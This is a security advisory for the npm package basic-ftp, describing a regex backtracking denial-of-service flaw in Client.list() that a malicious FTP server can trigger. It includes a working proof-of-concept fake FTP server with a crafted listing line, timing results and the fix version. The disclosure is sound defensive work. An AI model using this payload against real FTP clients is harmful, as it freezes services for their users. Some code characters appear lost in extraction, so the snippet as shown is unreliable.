GHSA-c475-qrg2-pj4r: Npm/basic-ftp vulnerability
Summary
Client.list() parses the server's directory listing with the Unix-style parser in parseListUnix.js. Its RELINE regex has two adjacent (\S+(?:\s\S+)) groups (owner name, then group name) followed by a required numeric size group. When a line starts with a valid listing prefix but the tokens after it never satisfy the size and date fields, the engine backtracks over every way of splitting those tokens between the two groups before it can fail, so matching one line costs roughly O(n²) in the line's length.
The server whose directory a client lists controls that listing, so it can return one line that pins the Node.js event loop for as long as it likes. parseList() picks the parser from the last non-blank line only, then runs it on every line, so a normal line placed last selects the Unix parser and a crafted line earlier hits the quadratic match.
Proof of concept
npm i basic-ftp && node repro.js:
js const net = require("net"), ftp = require("basic-ftp"); const KB = Number(process.env.LINEKB || 128); const payload = "-rw-r--r-- 1 " + "a ".repeat((KB 1024 - 13) / 2) + "!"; const listing = payload + "\r\n-rw-r--r-- 1 owner group 42 Jan 1 2020 file.txt\r\n"; const server = net.createServer(c => { c.setEncoding("latin1"); c.write("220 ok\r\n"); let buf = ""; c.on("data", d => { buf += d; let i; while ((i = buf.indexOf("\r\n")) !== -1) { const cmd = buf.slice(0, i).toUpperCase(); buf = buf.slice(i + 2); if (cmd.startsWith("USER")) c.write("331 .\r\n"); else if (cmd.startsWith("PASS")) c.write("230 .\r\n"); else if (cmd.startsWith("FEAT")) c.write("211-x\r\n UTF8\r\n211 End\r\n"); else if (cmd.startsWith("EPSV")) { const ds = net.createServer(s => { s.write(listing); s.end(); }); ds.listen(0, "127.0.0.1", () => c.write(229 (|||${ds.address().port}|)\r\n)); } else if (cmd.startsWith("LIST")) { c.write("150 .\r\n"); setTimeout(() => c.write("226 .\r\n"), 50); } else c.write("200 .\r\n"); } }); }); server.listen(0, "127.0.0.1", async () => { const client = new ftp.Client(0); await client.access({ host: "127.0.0.1", port: server.address().port, user: "x", password: "y" }); let beats = 0; const hb = setInterval(() => beats++, 1000); const t = Date.now(); await client.list(); clearInterval(hb); console.log(list() blocked ${(Date.now() - t) / 1000}s; heartbeats fired: ${beats}); process.exit(0); });
Prints list() blocked 39.75s; heartbeats fired: 0, versus ~0.06s for a normal listing. The event loop is frozen the whole time. Cost is quadratic: 32 KB ≈ 2.4s, 64 KB ≈ 9.6s, 128 KB ≈ 39s. maxListingBytes defaults to 40 MB, so a single line can be far larger, and ~1 MB already blocks for tens of minutes.
Impact
One directory listing freezes the whole process, under default options, through the primary API. This is the same "malicious FTP server causes client-side denial of service" shape as GHSA-rp42-5vxx-qpwr, also in Client.list() and rated high. The byte cap added there bounds memory, not the parser's CPU cost.
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
npm/basic-ftpto a version that resolves this vulnerability.Fixed in 6.2.1
Event History
Frequently Asked Questions
Who can trigger the issue in a client deployment?
An FTP server whose directory contents are listed by the client can trigger it, because that server controls the directory listing returned to Client.list(). This is most relevant when the client connects to untrusted or potentially malicious FTP servers.
What does an exploit listing need to contain?
The listing needs a crafted earlier line with a valid Unix-style prefix but tokens that do not satisfy the required size and date fields. A normal Unix-style line placed last causes parseList() to select the Unix parser, after which the crafted line can cause expensive backtracking and block the Node.js event loop.